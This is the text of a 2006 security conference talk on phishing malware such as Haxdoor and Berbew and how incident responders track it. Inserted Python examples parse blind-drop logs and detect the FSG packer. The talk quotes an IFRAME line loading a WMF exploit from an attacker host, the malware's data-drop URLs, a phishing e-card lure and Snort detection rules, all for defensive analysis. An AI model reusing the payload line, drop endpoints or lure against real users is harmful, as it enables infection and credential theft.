Trojans & Botnets & Malware, Oh My!

Shmoocon ‘06
Lance James
Secure Science Corporation
For Distribution
Copyright 2006 Secure Science Corp.
What this talk is about?

Malware in regards to incident response
- Pre-emptive techniques
- Research & development
- Related mainly to theft-intended malware

What is Malware?
Malicious software/hardware
- Designed to be harmful

Cyber Attack Sophistication Continues To Evolve

[Chart (source: CERT): attack sophistication plotted against intruder knowledge over 1980, 1985, 1990, 1995 and 2000+, with attack sophistication rising from low to high while the knowledge required of attackers falls. Techniques plotted include: password guessing, self-replicating code, password cracking, exploiting known vulnerabilities, disabling audits, back doors, hijacking sessions, burglaries, sweepers, sniffers, packet spoofing, GUI tools, automated probes/scans, www attacks, denial of service, network mgmt. diagnostics, "stealth"/advanced scanning techniques, staged attack, distributed attack tools, cross site scripting, bots.]
And Continue To Grow…

[Figure (source: Carnegie Mellon) with the following statistics:
- 85% of respondents had breaches (CSI/FBI survey)
- Avg reported loss from attacks was $2.7M per incident (CSI/FBI survey)
- 85% of the critical infrastructure is owned or operated by the private sector
- 137,000 security incidents in 2003, nearly twice as many as in 2002 (CERT)
- Data theft grew more than 650% over the past 3 years (CSI/FBI)]
Growth Or Liability?

- Over twenty per cent of Internet users now access online banking services. This total will reach 33% by 2006, according to The Online Banking Report.
- By 2010, over 55 million US households will use online banking and ePayments services, which are tipped as "growth areas".
- Wamu buys Providian, BofA buys MBNA

And so what about the ‘Phishing’ threat to e-commerce?
Source: ePaynews
What Is Phishing?

Phishing, also referred to as brand spoofing, is a variation on “fishing”: bait is thrown out in the hope that, while most will ignore it, some will be tempted into biting.

Phishing is the act of sending a communication to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
The communication (usually email) directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has.
The Web site, however, is bogus or hostile and set up only to steal the user’s information.
What’s Worse?

Email Phish or Phishing Malware?
- Some of the larger phishing groups have associations with both phishing emails and key-logging malware.
- While phishing email is very effective, the number of victims is significantly smaller than the victims of phishing malware.
- Logs recovered from base camps for phishing emails and malware show a startling difference.
Email –vs- Malware

Average number of accounts compromised in a week
  Phishing Emails: 100
  Phishing Malware / Keyloggers: 500,000

Type of information compromised
  Phishing Emails: Name, address, phone, SSN, credit card, VCC2, bank account numbers, logins and passwords, and even items such as mother’s maiden name or the answer to the “forgot your password” prompt. Generally, victims provide all of the information asked.
  Phishing Malware / Keyloggers: Account login, or credit card number with expiration and address. Generally, a single victim only loses a single amount of information. Few victims lose more than one type of information. And the information compromised may not match the information desired by the phisher.

Volume of data generated
  Phishing Emails: Each victim = < 500 bytes of data. 1 week = < 50 Kbytes. A single person can process the data in minutes.
  Phishing Malware / Keyloggers: A single key logging Trojan can generate hundreds of megabytes of data in a week. The data is not processed by hand. Instead, scripts are used to filter the information. Potentially valuable information is frequently ignored due to the filtering process.
Email –vs- Malware (cont.)

How often is the method viable?
  Phishing Emails: Reused regularly for weeks or months before requiring a change. Due to simple changes in the mailing list, a variety of people can be solicited; information is almost never collected from the same person twice.
  Phishing Malware / Key loggers: Most malware is effective for a week before anti-virus vendors develop signatures. Some phishing groups use malware in limited distributions. While these programs may exist for much longer durations, they generally collect less information. A single person that is infected may compromise the same information multiple times.

Total development cost to the phishers?
  Phishing Emails: A single phishing server may take one week to develop. The server may then be applied to hundreds of blind drop servers and reused for weeks or longer. Changes to the phishing email content (bait) can be measured in hours and may not need a change to the phishing server.
  Phishing Malware / Key loggers: A single malware system, including Trojan and receiving server, may take months to develop. Each variant may take a week or longer to develop. When generic antivirus signatures appear, redevelopment may take weeks or months.
Phishing Malware (cont.)

- In November of 2003, the concept of a single mega-virus changed.
- Gaobot, followed by Sasser and Berbew, took a different tack: rather than one mega-worm, these consisted of hundreds of variants, each slightly different.
- The goal of a variant was not to become a mega-worm, but rather to infect a small group of systems.
Phishing Malware (cont.)

This approach provided two key benefits to the malware authors:

- Limited distribution; limited detection. As long as the malware is not widespread, the anti-virus vendors would be less likely to detect the malware. (If Norton doesn’t know about a virus, then they cannot create a detection signature for the virus.)
  - Over the last 12 months Secure Science Corporation has identified dozens of virus variants used by phishers, carders, and generic malware authors that are not detected by anti-virus software.
- Rapid deployment. Nearly a hundred variants of Sasser were identified in less than three months. Each variant requires a different detection signature. The rapid modification and deployment ensures that anti-virus vendors will overtax their available resources, becoming less responsive to new strains. It also ensures that some variants will not be detected.
Phishing Malware (cont.)

We’re seeing a significant increase in malware used by phishing groups.
- IE exploitation via ActiveX blended threats
- Let’s take a closer look at the malware, and the threat model behind phishers and their malware.
- Malware key-logging myths
Phishing Malware (cont.)

A few phishing groups have been associated with specific malware.

The malware is used for a variety of purposes:
- Compromising hosts for operating the phishing server;
- Compromising hosts for relaying the bulk mailing;
- Directly attacking clients with key-logging software.

A single piece of malware may serve any or all of these purposes.
Malware Trends

In early 2004, the malware associated with phishing groups rarely appeared to be created specifically for phishing. Instead, it was focused on botnet* attributes:

- Email relay. The software opens network services that can be used to relay email anonymously. This is valuable to phishers, and spammers in general.
- Data mining. The malware frequently contains built-in functions for gathering information from the local system. The gathering usually focuses on software licenses (for game players, warez, or serialz dealers**) and Internet Explorer cache. The latter may contain information such as logins. For phishers, this type of data mining primarily focuses on account logins to phishing targets.

* A compromised system with remote control capabilities is a “bot”. A “botnet” is a collection of these compromised hosts.
** Illegally distributed software applications (warez) and the associated license keys (serialz) are frequently available and propagated through the underground software community.
Malware Trends (cont.)

Remote control. The malware usually has backdoor
capabilities. This permits a remote user to control and
access the compromised host. For a phisher, there is little
advantage to having a backdoor to a system unless they
plan to use the server for hosting a phishing site. But for
other people, such as virus writers or botnet farmers*,
remote control is an essential attribute.
* A “botnet farmer” is an individual or group that manages and
maintains one or more botnets. The botnet farmers generate revenue
by selling systems or CPU time to other people. Essentially, the botnet
becomes a large timeshare computer network.
Malware Trends (cont.)

By Q3 of 2004, a few, large phishing groups had evolved to support their own specific malware.
- While the malware did contain email relays, data mining functions, and remote control services, these had been tuned to support phishing specifically.
- Viruses such as W32.Spybot.Worm included specific code to harvest bank information from compromised hosts.
Malware Trends (cont.)

A few phishing groups also appeared to be associated with key logging software.

- While not true “key logging”, these applications capture data submitted (posted) to web servers.
- A true key logger would generate massive amounts of data, and it would be difficult for an automated system to identify account and login information within it.
Malware Trends (cont.)

Instead, these applications hook into Internet Explorer’s (IE) form submission system.
- All data from the submitted form is relayed to a blind drop operated by the phishers.
- The logs contain information about the infected system, as well as the URL and submitted form values.
- More importantly, the malware intercepts the data before it enters any secure network tunnel, such as SSL or HTTPS.
Malware Trends (cont.)

Examples of data output:

Recent examples of HaxDoor, Berbew and PWS.Banker reveal similar “Formgrabbing”:

reason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&from=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&state=MA&pc=*******

onlineid.bankofamerica.com/cgi-bin/sso.login.controller

[11023586123662948896]

[IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32]

Distributed through IE Class-ID attacks
- ADB/CHM
- IFRAME TAG
- Javaprxy???
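One way a response team can process a recovered blind-drop log of the shape shown above, so that the institution named in the URL can be notified with the secrets redacted and the number of affected victims counted. This is an added example written for this page, not code from the talk or from Secure Science Corporation; the four-line record layout (posted form body, target URL, bracketed victim id, bracketed IP and timestamp) is inferred from the sample above, the sample text is constructed with placeholder values, and the list of field names treated as secrets is an assumption.

```python
"""Parse form-grabber blind-drop output of the layout shown on the slide.

Added example, not code from the talk or from Secure Science Corporation.
Assumptions: each record is four non-empty lines (posted form body, target
URL without scheme, bracketed victim id, bracketed "IP:<addr> <dd.mm.yyyy>
<h:mm:ss>" stamp), and the SENSITIVE names below are the fields to redact.
"""
import re
from datetime import datetime
from urllib.parse import parse_qsl

# Constructed sample in the slide's layout; every value is a placeholder.
SAMPLE_LOG = """\
reason=&Access_ID=xxxxxxxx&Current_Passcode=xxxxxxx&from=homepage&state=MA

onlineid.bankofamerica.com/cgi-bin/sso.login.controller

[11023586123662948896]

[IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32]

user=jdoe&password=xxxxxxxx&submit=Login

login.example.net/auth

[00000000000000000002]

[IP:xxx.xxx.xxx.xxx 14.09.2005 10:01:07]
"""

# Assumed set of form-field names that carry secrets (compared case-insensitively).
SENSITIVE = {"current_passcode", "passcode", "password", "pswd", "pin"}

ID_RE = re.compile(r"^\[(\d+)\]$")
STAMP_RE = re.compile(r"^\[IP:(\S+)\s+(\d{1,2}\.\d{1,2}\.\d{4}\s+\d{1,2}:\d{2}:\d{2})\]$")


def parse_records(text):
    """Return one dict per record; raises ValueError on a malformed record."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 4:
        raise ValueError("drop text is not a whole number of 4-line records")
    records = []
    for i in range(0, len(lines), 4):
        body, url, ident, stamp = lines[i:i + 4]
        id_m, st_m = ID_RE.match(ident), STAMP_RE.match(stamp)
        if not (id_m and st_m):
            raise ValueError("bad id or stamp line at record %d" % (i // 4))
        host, _, path = url.partition("/")
        fields = dict(parse_qsl(body, keep_blank_values=True))
        records.append({
            "host": host,
            "path": "/" + path,
            "fields": fields,
            "victim_id": id_m.group(1),
            "ip": st_m.group(1),
            # The grabber writes day.month.year; turn it into a real datetime.
            "timestamp": datetime.strptime(st_m.group(2), "%d.%m.%Y %H:%M:%S"),
            "sensitive": [k for k in fields if k.lower() in SENSITIVE],
        })
    return records


def redact(record):
    """Copy of the record with secret field values replaced, for hand-off."""
    out = dict(record)
    out["fields"] = {k: ("<redacted>" if k.lower() in SENSITIVE else v)
                     for k, v in record["fields"].items()}
    return out


def victims_by_host(records):
    """Distinct victim ids per targeted host: the per-institution notification list."""
    seen = {}
    for r in records:
        seen.setdefault(r["host"], set()).add(r["victim_id"])
    return {host: len(ids) for host, ids in seen.items()}


if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    for r in recs:
        print(r["timestamp"], r["host"], redact(r)["fields"])
    print(victims_by_host(recs))
```

The parser rejects a drop file that is not a whole number of records rather than guessing, since a partially written log is common when a drop is recovered mid-operation; `redact` leaves the original record untouched so the unredacted copy can still go to law enforcement under the right handling.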
Side-Bar, Case Example

Anti-Malware Snake-Oil
- Virtual Keyboards
- Key-board Logging Protection
- Scramble Pads
- Anti-Spyware Desktop software

99% of Information Theft Malware doesn’t log key strokes! (it’s unscalable)

Side-Bar, Case Example (cont)
Malware Trends (cont.)

The end of 2004 showed a significant modification to the malware used by some phishing groups.

- The prior key logging systems generated gigabytes of data in a very short time. This made data mining difficult, since only a few sites were of interest to the phishers.
- By the end of 2004 and into 2005, the phishers had evolved their software.
  - Loggers focus on specific URLs, such as the web logins to Citibank and Bank of America.
  - It is believed that this was intended to pre-filter the data collected by the malware. Rather than collecting all of the submitted data, only submitted data of interest was collected.
  - More importantly, multiple viruses appeared with this capability, indicating that multiple phishing groups evolved at the same time. This strongly suggests that malware developers associated with phishers are in communication or have a common influencing source.
Malware Trends (cont.)

PG02 significant attack pattern identified

- Cpanel (WebISP in a box) exploitation
  - System compromise
  - Payload launch: www.site.com/images/newex.html
  - Hijacks network or box for spamming
- Sending spam
  - Uses DMS generation 2, enabling anonymity
  - Uses dark IP space for forged receive header
- Object class exploits for IE
  - Trojan downloader payload
  - Classifies malware as “MSITS.exe” (reference to MS-ITS protocol attacks)
  - Uses GPL code from www.edup.tudelft.nl/~bjwever/ (Berend-Jan Wever website)
Malware Trends (cont.)

Object Class attacks not “brand new”

- Uses older ADB exploit even though newer attacks exist
- January-February 2005 haxdoor variants existed for win98
- Suggests targeting “End of Life” product
  - Win98 EOL on security upgrades
  - No education on phishing
  - No SP2, built in pop-up blockers
- Evolutionary pattern
  - Suggests path of least resistance
  - Evolve when necessary
  - Win98 is plentiful and best target! Why move??
Latest Threats

WMF exploit
- Discovered by Dan Hubbard (WebSense)
- Found in the wild as a 0-day
- Phishers were using it from Day 0
- It was supposed to be patched in November (MS05-053)

Nuclear Grabber used by Phishing Group #02
- Written by Corpse (author of A-311 Death and Nuclear Grabber)
  - AV vendors call it Haxdoor
  - Sells software on Corpsespyware.net from $250.00 to $2500.00
  - Russian sales only
Phishing Trends (cont.)

Serial pattern for process of Haxdoor
- Successor to Berbew malware from 2004
- Very likely relation to original Berbew authors
- ’05 Berbew marked with Corpse’s signature
- Haxdoor malware written in Assembly
- Trojan creation kit
  - Compiles with permutations
  - Packed with FSG
  - Easy for phishers to compile on the fly with customized settings.
Latest Threats

Email from Phishing Group for WMF exploit
Dear Friend,
Friends [ fromfriends at aol.com ] has sent you an e-card from
<A href="http://123Greetings.com">123Greetings.com</A> .
<A href="http://123Greetings.com">123Greetings.com</A> is all about touching lives, bridging distances,
healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of life. Express
yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words
and music.
Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may
save it on your computer or take a print.
To view your e-card, choose from any of the following options:
<a href=http://www.123greetings.com/NY2006z3 target=_blank><table><tr><td><a
href="http://mujergorda.bitacoras.com/base/index.html">http://www.123greetings.com/NY2006z3</td
></tr></table></a>
What AV does with this?

Identify the Threat, Label it - Here’s their analysis
Problem?

Problem exists here
- Labeled low threat based on AV metrics
- Shoved in with the rest of the Trojan.small.em
- No known resolve other than desktop prevention
- Very reactive (as we all know)
- Evolving malware disables AV (common knowledge)

How do we change this?
- Change the AV metric
- Use common sense
- Proactive, not reactive
- Serial pattern analysis w/ common sense is key
Incident Response

Emerging Threats
- Management by objective
- Per incident basis
- Threat modelling necessary (but usually never happens)
- Malware author grouping
  - Serial pattern
  - Pre-emptive signatures
  - Forces them to evolve (ROI lowers)
  - Possible apprehension
R&D + IR = Proactive

Research for Haxdoor
- <IFRAME src="http://imkportedoor.com/images/ny.wmf" frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no> </IFRAME>
- Grabs msits.exe from www.site.com/images/msits.exe
- Packed with FSG (marked with Corpse signature within packing)
  003C1BD1 PUSH ies4dll.003C1165 ASCII www.pcpeek-webcam-sex.com
  003C1BE0 PUSH ies4dll.003C11C9 ASCII "images/data.php"
- Blind drop identified
- Data recovered in realtime
- Phishing the Phishers
Data Recovery
Impact DOA

Blind drop log monitoring
- Data returned to institution that’s compromised
- Real-time risk mitigation
- Pre-emptive action

What do we know?
- Packed with FSG
  - How many non-malicious executables are packed with FSG?
- Talks to /images/data.php
  - Some versions /images/dat7.php and /images/bsrv.php
- Group titles it msits.exe and msys.exe

Bleeding-Edge Snort

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02 Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02 Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;)
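Both rules above fire on the same two byte patterns: an "MZ" DOS stub, then "PE\0\0", Machine 0x014C (i386), NumberOfSections 2 and the ASCII "FSG!" in the four bytes where the COFF header's TimeDateStamp normally sits, at least 10 bytes past the end of the "MZ" match (Snort's distance:10). As an added example that is not from the talk, from the Bleeding-Edge rule authors or from Secure Science Corporation, the Python below reproduces that match offline for triaging a captured file or HTTP body, and separately checks whether the fingerprint sits at the file's real PE header (via e_lfanew), which is the first question to ask when deciding which hits are worth a closer look given the slide's own concern about benign FSG-packed executables. The sample buffers are constructed header-only fragments, not executables.

```python
"""Triage a captured file or HTTP body for the FSG-packer fingerprint used in
the Bleeding-Edge rules above. Added example; not from the talk, the rules'
authors or Secure Science. Sample buffers below are constructed header-only
fragments, not executables."""
import struct

MZ = b"MZ"
# "PE\0\0", Machine 0x014C (i386), NumberOfSections 2, then "FSG!" in the
# four bytes where the COFF header's TimeDateStamp normally sits.
FSG_PE = bytes.fromhex("50 45 00 00 4C 01 02 00 46 53 47 21")


def matches_fsg_rule(data, distance=10):
    """Mirror the rules' two content matches: find "MZ", then require FSG_PE
    to begin at least `distance` bytes past the end of that "MZ" (Snort's
    distance:10). Like Snort, retry with later "MZ" occurrences on failure."""
    start = 0
    while True:
        mz = data.find(MZ, start)
        if mz < 0:
            return False
        if data.find(FSG_PE, mz + len(MZ) + distance) >= 0:
            return True
        start = mz + 1


def pe_header_offset(data):
    """e_lfanew from the DOS header if it points at a "PE\0\0" signature, else None."""
    if len(data) < 0x40 or data[:2] != MZ:
        return None
    off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[off:off + 4] != b"PE\0\0":
        return None
    return off


def triage(data):
    """Rule-equivalent verdict plus whether the fingerprint is the real PE header."""
    off = pe_header_offset(data)
    return {
        "rule_match": matches_fsg_rule(data),
        "e_lfanew": off,
        "pe_header_fsg": off is not None and data[off:off + len(FSG_PE)] == FSG_PE,
    }


def build_sample(coff_start):
    """Constructed header fragment: MZ stub, e_lfanew = 0x80, COFF header at 0x80."""
    buf = bytearray(MZ + b"\0" * 0x3A)           # 0x3C bytes so far
    buf += struct.pack("<I", 0x80)               # e_lfanew
    buf += b"\0" * (0x80 - len(buf))
    buf += coff_start
    buf += b"\0" * 32
    return bytes(buf)


SAMPLE_FSG = build_sample(FSG_PE)
# Same layout but 3 sections and an ordinary timestamp: what a normal build looks like.
SAMPLE_PLAIN = build_sample(bytes.fromhex("50 45 00 00 4C 01 03 00 10 32 54 76"))

if __name__ == "__main__":
    for name, buf in (("fsg", SAMPLE_FSG), ("plain", SAMPLE_PLAIN)):
        print(name, triage(buf))
```

A hit where `pe_header_fsg` is false but `rule_match` is true means the pattern occurred somewhere other than the real PE header (an HTTP body carrying several files, or a chance match), and that is exactly the kind of alert to de-prioritise before chasing a blind drop.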
Outcome

Snort sigs
- Prevent a large amount of new phishing malware
  - Corpse has to change his method
  - Many other phishing malware packed same way

Problem response vs incident response
- Look at overall problem
  - Example: Form grabbing
  - Assume everyone is infected
  - How do we solve this?
Example: Form Grabbing
So you’re not a RCE

Tricks for IR
- IEHTTPHEADERS
  - BHO and IE hooks
  - Uses IE as agent
  - Locate blind drop
- VMWare
  - Monitor and mitigate
  - Sandbox (with snapshots)
  - Tools like sysinternals, Ollydbg, winpooch
  - Joe Stewart has some new tools for sandnet
- As it becomes more prevalent
  - More tools available for the common response team
  - Common sense is sometimes the best weapon
Contact Info
Secure Science Corporation
7770 Regents Rd.
Suite 113-535
San Diego, CA. 92122-1967
(877)570-0455
http://www.securescience.net
Email: [email protected]
Lance James ~ CTO
Questions